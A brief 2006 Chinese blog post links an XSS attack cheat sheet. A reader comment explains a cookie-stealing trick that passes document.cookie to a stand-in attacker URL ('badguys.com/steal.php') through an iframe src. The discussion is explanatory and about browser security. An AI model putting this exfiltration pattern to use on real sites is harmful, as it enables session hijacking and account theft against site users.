Pages - Menu

星期四, 8月 31, 2006

一個有關xss的東西

XSS攻擊招式表

好多的攻擊方法啊@@

2 則留言:

  1. 你最近有想要當黑人的傾向喔 XDD
    哈哈 :P

    回覆刪除
  2. 沒有啦...只是作javascript的時候被firefox用exception砸到死,然後研究過程中自然就會碰到這些東西orz,畢竟這些exception都是為了防備XSS而存在的嘛orz

    不過有種說法是,其實XSS防禦的罩門是iframe....因為iframe的src可以指定自己domain以外的來源,這是為了服務廣告商而留下來的歷史遺跡,不可能禁止。所以有種說法是用document.cookie抓到想要的東西後指定iframe src="badguys.com/steal.php?usercookie="+document.cookie就可以實際把request送出去,而雖然因為Domain不同,瀏覽器會阻擋main frame存取iframe的contentDocument,不過已經來不及了orz

    回覆刪除